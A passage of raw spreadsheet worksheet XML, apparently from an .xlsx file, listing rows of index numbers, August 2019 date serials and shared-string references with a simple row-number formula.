      <c r="D12622" s="1">
        <v>43680</v>
      </c>
      <c r="E12622" t="s">
        <v>19640</v>
      </c>
      <c r="F12622" t="s">
        <v>9975</v>
      </c>
      <c r="G12622" t="s">
        <v>22847</v>
      </c>
    </row>
    <row r="12623" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12623">
        <f t="shared" si="197"/>
        <v>12622</v>
      </c>
      <c r="B12623">
        <v>2622</v>
      </c>
      <c r="C12623" t="s">
        <v>19637</v>
      </c>
      <c r="D12623" s="1">
        <v>43689</v>
      </c>
      <c r="F12623" t="s">
        <v>10526</v>
      </c>
      <c r="G12623" t="s">
        <v>22848</v>
      </c>
    </row>
    <row r="12624" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12624">
        <f t="shared" si="197"/>
        <v>12623</v>
      </c>
      <c r="B12624">
        <v>2623</v>
      </c>
      <c r="C12624" t="s">
        <v>19637</v>
      </c>
      <c r="D12624" s="1">
        <v>43687</v>
      </c>
      <c r="E12624" t="s">
        <v>22849</v>
      </c>
      <c r="F12624" t="s">
        <v>10021</v>
      </c>
      <c r="G12624" t="s">
        <v>22850</v>
      </c>
    </row>
    <row r="12625" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12625">
        <f t="shared" si="197"/>
        <v>12624</v>
      </c>
      <c r="B12625">
        <v>2624</v>
      </c>
      <c r="C12625" t="s">
        <v>19637</v>
      </c>
      <c r="D12625" s="1">
        <v>43699</v>
      </c>
      <c r="E12625" t="s">
        <v>19640</v>
      </c>
      <c r="F12625" t="s">
        <v>10021</v>
      </c>
      <c r="G12625" t="s">
        <v>22851</v>
      </c>
    </row>
    <row r="12626" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12626">
        <f t="shared" si="197"/>
        <v>12625</v>
      </c>
      <c r="B12626">
        <v>2625</v>
      </c>
      <c r="C12626" t="s">
        <v>19637</v>
      </c>
      <c r="D12626" s="1">
        <v>43704</v>
      </c>
      <c r="E12626" t="s">
        <v>19640</v>
      </c>
      <c r="F12626" t="s">
        <v>10021</v>
      </c>
      <c r="G12626" t="s">
        <v>22852</v>
      </c>
    </row>
    <row r="12627" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12627">
        <f t="shared" si="197"/>
        <v>12626</v>
      </c>
      <c r="B12627">
        <v>2626</v>
      </c>
      <c r="C12627" t="s">
        <v>19637</v>
      </c>
      <c r="D12627" s="1">
        <v>43688</v>
      </c>
      <c r="F12627" t="s">
        <v>10021</v>
      </c>
      <c r="G12627" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="12628" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12628">
        <f t="shared" si="197"/>
        <v>12627</v>
      </c>
      <c r="B12628">
        <v>2627</v>
      </c>
      <c r="C12628" t="s">
        <v>19637</v>
      </c>
      <c r="D12628" s="1">
        <v>43704</v>
      </c>
      <c r="E12628" t="s">
        <v>20220</v>
      </c>
      <c r="F12628" t="s">
        <v>10021</v>
      </c>
      <c r="G12628" t="s">
        <v>22853</v>
      </c>
    </row>
    <row r="12629" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12629">
        <f t="shared" si="197"/>
        <v>12628</v>
      </c>
      <c r="B12629">
        <v>2628</v>
      </c>
      <c r="C12629" t="s">
        <v>19637</v>
      </c>
      <c r="D12629" s="1">
        <v>43681</v>
      </c>
      <c r="E12629" t="s">
        <v>19750</v>
      </c>
      <c r="F12629" t="s">
        <v>9978</v>
      </c>
      <c r="G12629" t="s">
        <v>22854</v>
      </c>
    </row>
    <row r="12630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12630">
        <f t="shared" si="197"/>
        <v>12629</v>
      </c>
      <c r="B12630">
        <v>2629</v>
      </c>
      <c r="C12630" t="s">
        <v>19637</v>
      </c>
      <c r="D12630" s="1">
        <v>43686</v>
      </c>
      <c r="F12630" t="s">
        <v>10526</v>
      </c>
      <c r="G12630" t="s">
        <v>22855</v>
      </c>
    </row>
    <row r="12631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12631">
        <f t="shared" si="197"/>
        <v>12630</v>
      </c>
      <c r="B12631">
        <v>2630</v>
      </c>
      <c r="C12631" t="s">
        <v>19637</v>
      </c>
      <c r="D12631" s="1">
        <v>43682</v>
      </c>
      <c r="E12631" t="s">
        <v>19643</v>
      </c>
      <c r="F12631" t="s">
        <v>10021</v>
      </c>
      <c r="G12631" t="s">
        <v>22856</v>
      </c>
    </row>
    <row r="12632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12632">
        <f t="shared" si="197"/>
        <v>12631</v>
      </c>
      <c r="B12632">
        <v>2631</v>
      </c>
      <c r="C12632" t="s">
        <v>19637</v>
      </c>
      <c r="D12632" s="1">
        <v>43688</v>
      </c>
      <c r="F12632" t="s">
        <v>10526</v>
      </c>
      <c r="G12632" t="s">
        <v>22857</v>
      </c>
    </row>
    <row r="12633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12633">
        <f t="shared" si="197"/>
        <v>12632</v>
      </c>
      <c r="B12633">
        <v>2632</v>
      </c>
      <c r="C12633" t="s">
        <v>19637</v>
      </c>
      <c r="D12633" s="1">
        <v>43705</v>
      </c>
      <c r="E12633" t="s">
        <v>22858</v>
      </c>
      <c r="F12633" t="s">
        <v>10526</v>
      </c>
      <c r="G12633" t="s">
        <v>22859</v>
      </c>
    </row>
    <row r="12634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12634">
        <f t="shared" si="197"/>
        <v>12633</v>
      </c>
      <c r="B12634">
        <v>2633</v>
      </c>
      <c r="C12634" t="s">
        <v>19637</v>
      </c>
      <c r="D12634" s="1">
        <v>43678</v>
      </c>
      <c r="F12634" t="s">
        <v>10526</v>
      </c>
      <c r="G12634" t="s">
        <v>22860</v>
      </c>
    </row>
    <row r="12635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12635">
        <f t="shared" si="197"/>
        <v>12634</v>
      </c>
      <c r="B12635">
        <v>2634</v>
      </c>
      <c r="C12635" t="s">
        <v>19637</v>
      </c>
      <c r="D12635" s="1">
        <v>43699</v>
      </c>
      <c r="E12635" t="s">
        <v>19640</v>
      </c>
      <c r="F12635" t="s">
        <v>10021</v>
      </c>
      <c r="G12635" t="s">
        <v>22861</v>
      </c>
    </row>
    <row r="12636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12636">
        <f t="shared" si="197"/>
        <v>12635</v>
      </c>
      <c r="B12636">
        <v>2635</v>
      </c>
      <c r="C12636" t="s">
        <v>19637</v>
      </c>
      <c r="D12636" s="1">
        <v>43696</v>
      </c>
      <c r="E12636" t="s">
        <v>19643</v>
      </c>
      <c r="F12636" t="s">
        <v>10021</v>
      </c>
      <c r="G12636" t="s">
        <v>22862</v>
      </c>
    </row>
    <row r="12637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12637">
        <f t="shared" si="197"/>
        <v>12636</v>
      </c>
      <c r="B12637">
        <v>2636</v>
      </c>
      <c r="C12637" t="s">
        <v>19637</v>
      </c>
      <c r="D12637" s="1">
        <v>43704</v>
      </c>
      <c r="F12637" t="s">
        <v>10526</v>
      </c>
      <c r="G12637" t="s">
        <v>22863</v>
      </c>
    </row>
    <row r="12638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12638">
        <f t="shared" si="197"/>
        <v>12637</v>
      </c>
      <c r="B12638">
        <v>2637</v>
      </c>
      <c r="C12638" t="s">
        <v>19637</v>
      </c>
      <c r="D12638" s="1">
        <v>43697</v>
      </c>
      <c r="F12638" t="s">
        <v>9975</v>
      </c>
      <c r="G12638" t="s">
        <v>22864</v>
      </c>
    </row>
    <row r="12639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12639">
        <f t="shared" si="197"/>
        <v>12638</v>
      </c>
      <c r="B12639">
        <v>2638</v>
      </c>
      <c r="C12639" t="s">
        <v>19637</v>
      </c>
      <c r="D12639" s="1">
        <v>43705</v>
      </c>
      <c r="E12639" t="s">
        <v>19640</v>
      </c>
      <c r="F12639" t="s">
        <v>10021</v>
      </c>
      <c r="G12639" t="s">
        <v>22865</v>
      </c>
    </row>
    <row r="12640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12640">
        <f t="shared" si="197"/>
        <v>12639</v>
      </c>
      <c r="B12640">
        <v>2639</v>
      </c>
      <c r="C12640" t="s">
        <v>19637</v>
      </c>
      <c r="D12640" s="1">
        <v>43693</v>
      </c>
      <c r="F12640" t="s">
        <v>9978</v>
      </c>
      <c r="G12640" t="s">
        <v>22866</v>
      </c>
    </row>
    <row r="12641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12641">
        <f t="shared" si="197"/>
        <v>12640</v>
      </c>
      <c r="B12641">
        <v>2640</v>
      </c>
      <c r="C12641" t="s">
        <v>19637</v>
      </c>
      <c r="D12641" s="1">
        <v>43691</v>
      </c>
      <c r="F12641" t="s">
        <v>10021</v>
      </c>
      <c r="G12641" t="s">
        <v>22867</v>
      </c>
    </row>
    <row r="12642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12642">
        <f t="shared" si="197"/>
        <v>12641</v>
      </c>
      <c r="B12642">
        <v>2641</v>
      </c>
      <c r="C12642" t="s">
        <v>19637</v>
      </c>
      <c r="D12642" s="1">
        <v>43705</v>
      </c>
      <c r="E12642" t="s">
        <v>19736</v>
      </c>
      <c r="F12642" t="s">
        <v>10526</v>
      </c>
      <c r="G12642" t="s">
        <v>22868</v>
      </c>
    </row>
    <row r="12643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12643">
        <f t="shared" si="197"/>
        <v>12642</v>
      </c>
      <c r="B12643">
        <v>2642</v>
      </c>
      <c r="C12643" t="s">
        <v>19637</v>
      </c>
      <c r="D12643" s="1">
        <v>43691</v>
      </c>
      <c r="E12643" t="s">
        <v>22869</v>
      </c>
      <c r="F12643" t="s">
        <v>10021</v>
      </c>
      <c r="G12643" t="s">
        <v>22870</v>
      </c>
    </row>
    <row r="12644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12644">
        <f t="shared" si="197"/>
        <v>12643</v>
      </c>
      <c r="B12644">
        <v>2643</v>
      </c>
      <c r="C12644" t="s">
        <v>19637</v>
      </c>
      <c r="D12644" s="1">
        <v>43689</v>
      </c>
      <c r="E12644" t="s">
        <v>22467</v>
      </c>
      <c r="F12644" t="s">
        <v>10526</v>
      </c>
      <c r="G12644" t="s">
        <v>22871</v>
      </c>
    </row>
    <row r="12645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12645">
        <f t="shared" si="197"/>
        <v>12644</v>
      </c>
      <c r="B12645">
        <v>2644</v>
      </c>
      <c r="C12645" t="s">
        <v>19637</v>
      </c>
      <c r="D12645" s="1">
        <v>43697</v>
      </c>
      <c r="E12645" t="s">
        <v>20757</v>
      </c>
      <c r="F12645" t="s">
        <v>9978</v>
      </c>
      <c r="G12645" t="s">
        <v>22872</v>
      </c>
    </row>
    <row r="12646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12646">
        <f t="shared" si="197"/>
        <v>12645</v>
      </c>
      <c r="B12646">
        <v>2645</v>
      </c>
      <c r="C12646" t="s">
        <v>19637</v>
      </c>
      <c r="D12646" s="1">
        <v>43701</v>
      </c>
      <c r="E12646" t="s">
        <v>19860</v>
      </c>
      <c r="F12646" t="s">
        <v>10526</v>
      </c>
      <c r="G12646" t="s">
        <v>22873</v>
      </c>
    </row>
    <row r="12647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12647">
        <f t="shared" si="197"/>
        <v>12646</v>
      </c>
      <c r="B12647">
        <v>2646</v>
      </c>
      <c r="C12647" t="s">
        <v>19637</v>
      </c>
      <c r="D12647" s="1">
        <v>43703</v>
      </c>
      <c r="E12647" t="s">
        <v>22874</v>
      </c>
      <c r="F12647" t="s">
        <v>10526</v>
      </c>
      <c r="G12647" t="s">
        <v>22875</v>
      </c>
    </row>
    <row r="12648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12648">
        <f t="shared" si="197"/>
        <v>12647</v>
      </c>
      <c r="B12648">
        <v>2647</v>
      </c>
      <c r="C12648" t="s">
        <v>19637</v>
      </c>
      <c r="D12648" s="1">
        <v>43693</v>
      </c>
      <c r="E12648" t="s">
        <v>19701</v>
      </c>
      <c r="F12648" t="s">
        <v>10021</v>
      </c>
      <c r="G12648" t="s">
        <v>22876</v>
      </c>
    </row>
    <row r="12649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12649">
        <f t="shared" si="197"/>
        <v>12648</v>
      </c>
      <c r="B12649">
        <v>2648</v>
      </c>
      <c r="C12649" t="s">
        <v>19637</v>
      </c>
      <c r="D12649" s="1">
        <v>43681</v>
      </c>
      <c r="E12649" t="s">
        <v>22877</v>
      </c>
      <c r="F12649" t="s">
        <v>10526</v>
      </c>
      <c r="G12649" t="s">
        <v>22878</v>
      </c>
    </row>
    <row r="12650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12650">
        <f t="shared" si="197"/>
        <v>12649</v>
      </c>
      <c r="B12650">
        <v>2649</v>
      </c>
      <c r="C12650" t="s">
        <v>19637</v>
      </c>
      <c r="D12650" s="1">
        <v>43699</v>
      </c>
      <c r="E12650" t="s">
        <v>22879</v>
      </c>
      <c r="F12650" t="s">
        <v>10526</v>
      </c>
      <c r="G12650" t="s">
        <v>22880</v>
      </c>
    </row>
    <row r="12651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12651">
        <f t="shared" si="197"/>
        <v>12650</v>
      </c>
      <c r="B12651">
        <v>2650</v>
      </c>
      <c r="C12651" t="s">
        <v>19637</v>
      </c>
      <c r="D12651" s="1">
        <v>43705</v>
      </c>
      <c r="E12651" t="s">
        <v>22881</v>
      </c>
      <c r="F12651" t="s">
        <v>10526</v>
      </c>
      <c r="G12651" t="s">
        <v>22882</v>
      </c>
    </row>
    <row r="12652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12652">
        <f t="shared" si="197"/>
        <v>12651</v>
      </c>
      <c r="B12652">
        <v>2651</v>
      </c>
      <c r="C12652" t="s">
        <v>19637</v>
      </c>
      <c r="D12652" s="1">
        <v>43693</v>
      </c>
      <c r="E12652" t="s">
        <v>22883</v>
      </c>
      <c r="F12652" t="s">
        <v>10526</v>
      </c>
      <c r="G12652" t="s">
        <v>22884</v>
      </c>
    </row>
    <row r="12653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12653">
        <f t="shared" si="197"/>
        <v>12652</v>
      </c>
      <c r="B12653">
        <v>2652</v>
      </c>
      <c r="C12653" t="s">
        <v>19637</v>
      </c>
      <c r="D12653" s="1">
        <v>43692</v>
      </c>
      <c r="E12653" t="s">
        <v>19643</v>
      </c>
      <c r="F12653" t="s">
        <v>10021</v>
      </c>
      <c r="G12653" t="s">
        <v>22885</v>
      </c>
    </row>
    <row r="12654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12654">
        <f t="shared" si="197"/>
        <v>12653</v>
      </c>
      <c r="B12654">
        <v>2653</v>
      </c>
      <c r="C12654" t="s">
        <v>19637</v>
      </c>
      <c r="D12654" s="1">
        <v>43703</v>
      </c>
      <c r="F12654" t="s">
        <v>10526</v>
      </c>
      <c r="G12654" t="s">
        <v>22886</v>
      </c>
    </row>
    <row r="12655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12655">
        <f t="shared" si="197"/>
        <v>12654</v>
      </c>
      <c r="B12655">
        <v>2654</v>
      </c>
      <c r="C12655" t="s">
        <v>19637</v>
      </c>
      <c r="D12655" s="1">
        <v>43681</v>
      </c>
      <c r="E12655" t="s">
        <v>19750</v>
      </c>
      <c r="F12655" t="s">
        <v>9978</v>
      </c>
      <c r="G12655" t="s">
        <v>22887</v>
      </c>
    </row>
    <row r="12656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12656">
        <f t="shared" si="197"/>
        <v>12655</v>
      </c>
      <c r="B12656">
        <v>2655</v>
      </c>
      <c r="C12656" t="s">
        <v>19637</v>
      </c>
      <c r="D12656" s="1">
        <v>43705</v>
      </c>
      <c r="E12656" t="s">
        <v>22635</v>
      </c>
      <c r="F12656" t="s">
        <v>10526</v>
      </c>
      <c r="G12656" t="s">
        <v>22888</v>
      </c>
    </row>
    <row r="12657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12657">
        <f t="shared" si="197"/>
        <v>12656</v>
      </c>
      <c r="B12657">
        <v>2656</v>
      </c>
      <c r="C12657" t="s">
        <v>19637</v>
      </c>
      <c r="D12657" s="1">
        <v>43686</v>
      </c>
      <c r="E12657" t="s">
        <v>19645</v>
      </c>
      <c r="F12657" t="s">
        <v>9975</v>
      </c>
      <c r="G12657" t="s">
        <v>22889</v>
      </c>
    </row>
    <row r="12658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12658">
        <f t="shared" si="197"/>
        <v>12657</v>
      </c>
      <c r="B12658">
        <v>2657</v>
      </c>
      <c r="C12658" t="s">
        <v>19637</v>
      </c>
      <c r="D12658" s="1">
        <v>43694</v>
      </c>
      <c r="E12658" t="s">
        <v>19640</v>
      </c>
      <c r="F12658" t="s">
        <v>9975</v>
      </c>
      <c r="G12658" t="s">
        <v>22890</v>
      </c>
    </row>
    <row r="12659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12659">
        <f t="shared" si="197"/>
        <v>12658</v>
      </c>
      <c r="B12659">
        <v>2658</v>
      </c>
      <c r="C12659" t="s">
        <v>19637</v>
      </c>
      <c r="D12659" s="1">
        <v>43706</v>
      </c>
      <c r="E12659" t="s">
        <v>20034</v>
      </c>
      <c r="F12659" t="s">
        <v>10021</v>
      </c>
      <c r="G12659" t="s">
        <v>22891</v>
      </c>
    </row>
    <row r="12660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12660">
        <f t="shared" si="197"/>
        <v>12659</v>
      </c>
      <c r="B12660">
        <v>2659</v>
      </c>
      <c r="C12660" t="s">
        <v>19637</v>
      </c>
      <c r="D12660" s="1">
        <v>43703</v>
      </c>
      <c r="F12660" t="s">
        <v>10526</v>
      </c>
      <c r="G12660" t="s">
        <v>22892</v>
      </c>
    </row>
    <row r="12661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12661">
        <f t="shared" si="197"/>
        <v>12660</v>
      </c>
      <c r="B12661">
        <v>2660</v>
      </c>
      <c r="C12661" t="s">
        <v>19637</v>
      </c>
      <c r="D12661" s="1">
        <v>43694</v>
      </c>
      <c r="E12661" t="s">
        <v>19750</v>
      </c>
      <c r="F12661" t="s">
        <v>9978</v>
      </c>
      <c r="G12661" t="s">
        <v>22893</v>
      </c>
    </row>
    <row r="12662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12662">
        <f t="shared" si="197"/>
        <v>12661</v>
      </c>
      <c r="B12662">
        <v>2661</v>
      </c>
      <c r="C12662" t="s">
        <v>19637</v>
      </c>
      <c r="D12662" s="1">
        <v>43696</v>
      </c>
      <c r="E12662" t="s">
        <v>19750</v>
      </c>
      <c r="F12662" t="s">
        <v>9978</v>
      </c>
      <c r="G12662" t="s">
        <v>22894</v>
      </c>
    </row>
    <row r="12663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12663">
        <f t="shared" si="197"/>
        <v>12662</v>
      </c>
      <c r="B12663">
        <v>2662</v>
      </c>
      <c r="C12663" t="s">
        <v>19637</v>
      </c>
      <c r="D12663" s="1">
        <v>43690</v>
      </c>
      <c r="E12663" t="s">
        <v>19650</v>
      </c>
      <c r="F12663" t="s">
        <v>10021</v>
      </c>
      <c r="G12663" t="s">
        <v>22895</v>
      </c>
    </row>
    <row r="12664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12664">
        <f t="shared" si="197"/>
        <v>12663</v>
      </c>
      <c r="B12664">
        <v>2663</v>
      </c>
      <c r="C12664" t="s">
        <v>19637</v>
      </c>
      <c r="D12664" s="1">
        <v>43686</v>
      </c>
      <c r="F12664" t="s">
        <v>10526</v>
      </c>
      <c r="G12664" t="s">
        <v>22896</v>
      </c>
    </row>
    <row r="12665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12665">
        <f t="shared" si="197"/>
        <v>12664</v>
      </c>
      <c r="B12665">
        <v>2664</v>
      </c>
      <c r="C12665" t="s">
        <v>19637</v>
      </c>
      <c r="D12665" s="1">
        <v>43681</v>
      </c>
      <c r="E12665" t="s">
        <v>19640</v>
      </c>
      <c r="F12665" t="s">
        <v>9975</v>
      </c>
      <c r="G12665" t="s">
        <v>22897</v>
      </c>
    </row>
    <row r="12666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12666">
        <f t="shared" si="197"/>
        <v>12665</v>
      </c>
      <c r="B12666">
        <v>2665</v>
      </c>
      <c r="C12666" t="s">
        <v>19637</v>
      </c>
      <c r="D12666" s="1">
        <v>43682</v>
      </c>
      <c r="F12666" t="s">
        <v>10526</v>
      </c>
      <c r="G12666" t="s">
        <v>22076</v>
      </c>
    </row>
    <row r="12667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12667">
        <f t="shared" si="197"/>
        <v>12666</v>
      </c>
      <c r="B12667">
        <v>2666</v>
      </c>
      <c r="C12667" t="s">
        <v>19637</v>
      </c>
      <c r="D12667" s="1">
        <v>43704</v>
      </c>
      <c r="F12667" t="s">
        <v>10526</v>
      </c>
      <c r="G12667" t="s">
        <v>22898</v>
      </c>
    </row>
    <row r="12668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12668">
        <f t="shared" si="197"/>
        <v>12667</v>
      </c>
      <c r="B12668">
        <v>2667</v>
      </c>
      <c r="C12668" t="s">
        <v>19637</v>
      </c>
      <c r="D12668" s="1">
        <v>43687</v>
      </c>
      <c r="F12668" t="s">
        <v>9975</v>
      </c>
      <c r="G12668" t="s">
        <v>22899</v>
      </c>
    </row>
    <row r="12669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12669">
        <f t="shared" si="197"/>
        <v>12668</v>
      </c>
      <c r="B12669">
        <v>2668</v>
      </c>
      <c r="C12669" t="s">
        <v>19637</v>
      </c>
      <c r="D12669" s="1">
        <v>43708</v>
      </c>
      <c r="E12669" t="s">
        <v>20185</v>
      </c>
      <c r="F12669" t="s">
        <v>9975</v>
      </c>
      <c r="G12669" t="s">
        <v>22900</v>
      </c>
    </row>
    <row r="12670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12670">
        <f t="shared" si="197"/>
        <v>12669</v>
      </c>
      <c r="B12670">
        <v>2669</v>
      </c>
      <c r="C12670" t="s">
        <v>19637</v>
      </c>
      <c r="D12670" s="1">
        <v>43686</v>
      </c>
      <c r="E12670" t="s">
        <v>22901</v>
      </c>
      <c r="F12670" t="s">
        <v>9978</v>
      </c>
      <c r="G12670" t="s">
        <v>22902</v>
      </c>
    </row>
    <row r="12671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12671">
        <f t="shared" si="197"/>
        <v>12670</v>
      </c>
      <c r="B12671">
        <v>2670</v>
      </c>
      <c r="C12671" t="s">
        <v>19637</v>
      </c>
      <c r="D12671" s="1">
        <v>43700</v>
      </c>
      <c r="E12671" t="s">
        <v>21318</v>
      </c>
      <c r="F12671" t="s">
        <v>10526</v>
      </c>
      <c r="G12671" t="s">
        <v>22903</v>
      </c>
    </row>
    <row r="12672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12672">
        <f t="shared" si="197"/>
        <v>12671</v>
      </c>
      <c r="B12672">
        <v>2671</v>
      </c>
      <c r="C12672" t="s">
        <v>19637</v>
      </c>
      <c r="D12672" s="1">
        <v>43695</v>
      </c>
      <c r="E12672" t="s">
        <v>19640</v>
      </c>
      <c r="F12672" t="s">
        <v>10526</v>
      </c>
      <c r="G12672" t="s">
        <v>22904</v>
      </c>
    </row>
    <row r="12673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12673">
        <f t="shared" si="197"/>
        <v>12672</v>
      </c>
      <c r="B12673">
        <v>2672</v>
      </c>
      <c r="C12673" t="s">
        <v>19637</v>
      </c>
      <c r="D12673" s="1">
        <v>43704</v>
      </c>
      <c r="E12673" t="s">
        <v>19640</v>
      </c>
      <c r="F12673" t="s">
        <v>9975</v>
      </c>
      <c r="G12673" t="s">
        <v>22905</v>
      </c>
    </row>
    <row r="12674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12674">
        <f t="shared" si="197"/>
        <v>12673</v>
      </c>
      <c r="B12674">
        <v>2673</v>
      </c>
      <c r="C12674" t="s">
        <v>19637</v>
      </c>
      <c r="D12674" s="1">
        <v>43691</v>
      </c>
      <c r="E12674" t="s">
        <v>20878</v>
      </c>
      <c r="F12674" t="s">
        <v>10526</v>
      </c>
      <c r="G12674" t="s">
        <v>22906</v>
      </c>
    </row>
    <row r="12675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12675">
        <f t="shared" ref="A12675:A12738" si="198">+ROW(A12674)</f>
        <v>12674</v>
      </c>
      <c r="B12675">
        <v>2674</v>
      </c>
      <c r="C12675" t="s">
        <v>19637</v>
      </c>
      <c r="D12675" s="1">
        <v>43697</v>
      </c>
      <c r="F12675" t="s">
        <v>10021</v>
      </c>
      <c r="G12675" t="s">
        <v>22907</v>
      </c>
    </row>
    <row r="12676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12676">
        <f t="shared" si="198"/>
        <v>12675</v>
      </c>
      <c r="B12676">
        <v>2675</v>
      </c>
      <c r="C12676" t="s">
        <v>19637</v>
      </c>
      <c r="D12676" s="1">
        <v>43707</v>
      </c>
      <c r="F12676" t="s">
        <v>10526</v>
      </c>
      <c r="G12676" t="s">
        <v>22908</v>
      </c>
    </row>
    <row r="12677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12677">
        <f t="shared" si="198"/>
        <v>12676</v>
      </c>
      <c r="B12677">
        <v>2676</v>
      </c>
      <c r="C12677" t="s">
        <v>19637</v>
      </c>
      <c r="D12677" s="1">
        <v>43692</v>
      </c>
      <c r="E12677" t="s">
        <v>22909</v>
      </c>
      <c r="F12677" t="s">
        <v>10021</v>
      </c>
      <c r="G12677" t="s">
        <v>22910</v>
      </c>
    </row>
    <row r="12678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12678">
        <f t="shared" si="198"/>
        <v>12677</v>
      </c>
      <c r="B12678">
        <v>2677</v>
      </c>
      <c r="C12678" t="s">
        <v>19637</v>
      </c>
      <c r="D12678" s="1">
        <v>43688</v>
      </c>
      <c r="E12678" t="s">
        <v>19717</v>
      </c>
      <c r="F12678" t="s">
        <v>10526</v>
      </c>
      <c r="G12678" t="s">
        <v>22911</v>
      </c>
    </row>
    <row r="12679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12679">
        <f t="shared" si="198"/>
        <v>12678</v>
      </c>
      <c r="B12679">
        <v>2678</v>
      </c>
      <c r="C12679" t="s">
        <v>19637</v>
      </c>
      <c r="D12679" s="1">
        <v>43689</v>
      </c>
      <c r="E12679" t="s">
        <v>19687</v>
      </c>
      <c r="F12679" t="s">
        <v>10021</v>
      </c>
      <c r="G12679" t="s">
        <v>22912</v>
      </c>
    </row>
    <row r="12680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12680">
        <f t="shared" si="198"/>
        <v>12679</v>
      </c>
      <c r="B12680">
        <v>2679</v>
      </c>
      <c r="C12680" t="s">
        <v>19637</v>
      </c>
      <c r="D12680" s="1">
        <v>43682</v>
      </c>
      <c r="F12680" t="s">
        <v>9978</v>
      </c>
      <c r="G12680" t="s">
        <v>22913</v>
      </c>
    </row>
    <row r="12681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12681">
        <f t="shared" si="198"/>
        <v>12680</v>
      </c>
      <c r="B12681">
        <v>2680</v>
      </c>
      <c r="C12681" t="s">
        <v>19637</v>
      </c>
      <c r="D12681" s="1">
        <v>43690</v>
      </c>
      <c r="E12681" t="s">
        <v>22914</v>
      </c>
      <c r="F12681" t="s">
        <v>10526</v>
      </c>
      <c r="G12681" t="s">
        <v>22915</v>
      </c>
    </row>
    <row r="12682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12682">
        <f t="shared" si="198"/>
        <v>12681</v>
      </c>
      <c r="B12682">
        <v>2681</v>
      </c>
      <c r="C12682" t="s">
        <v>19637</v>
      </c>
      <c r="D12682" s="1">
        <v>43700</v>
      </c>
      <c r="E12682" t="s">
        <v>22916</v>
      </c>
      <c r="F12682" t="s">
        <v>10526</v>
      </c>
      <c r="G12682" t="s">
        <v>22917</v>
      </c>
    </row>
    <row r="12683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12683">
        <f t="shared" si="198"/>
        <v>12682</v>
      </c>
      <c r="B12683">
        <v>2682</v>
      </c>
      <c r="C12683" t="s">
        <v>19637</v>
      </c>
      <c r="D12683" s="1">
        <v>43687</v>
      </c>
      <c r="F12683" t="s">
        <v>10526</v>
      </c>
      <c r="G12683" t="s">
        <v>22918</v>
      </c>
    </row>
    <row r="12684" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12684">
        <f t="shared" si="198"/>
        <v>12683</v>
      </c>
      <c r="B12684">
        <v>2683</v>
      </c>
      <c r="C12684" t="s">
        <v>19637</v>
      </c>
      <c r="D12684" s="1">
        <v>43693</v>
      </c>
      <c r="E12684" t="s">
        <v>19687</v>
      </c>
      <c r="F12684" t="s">
        <v>10021</v>
      </c>
      <c r="G12684" t="s">
        <v>22919</v>
      </c>
    </row>
    <row r="12685" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12685">
        <f t="shared" si="198"/>
        <v>12684</v>
      </c>
      <c r="B12685">
        <v>2684</v>
      </c>
      <c r="C12685" t="s">
        <v>19637</v>
      </c>
      <c r="D12685" s="1">
        <v>43703</v>
      </c>
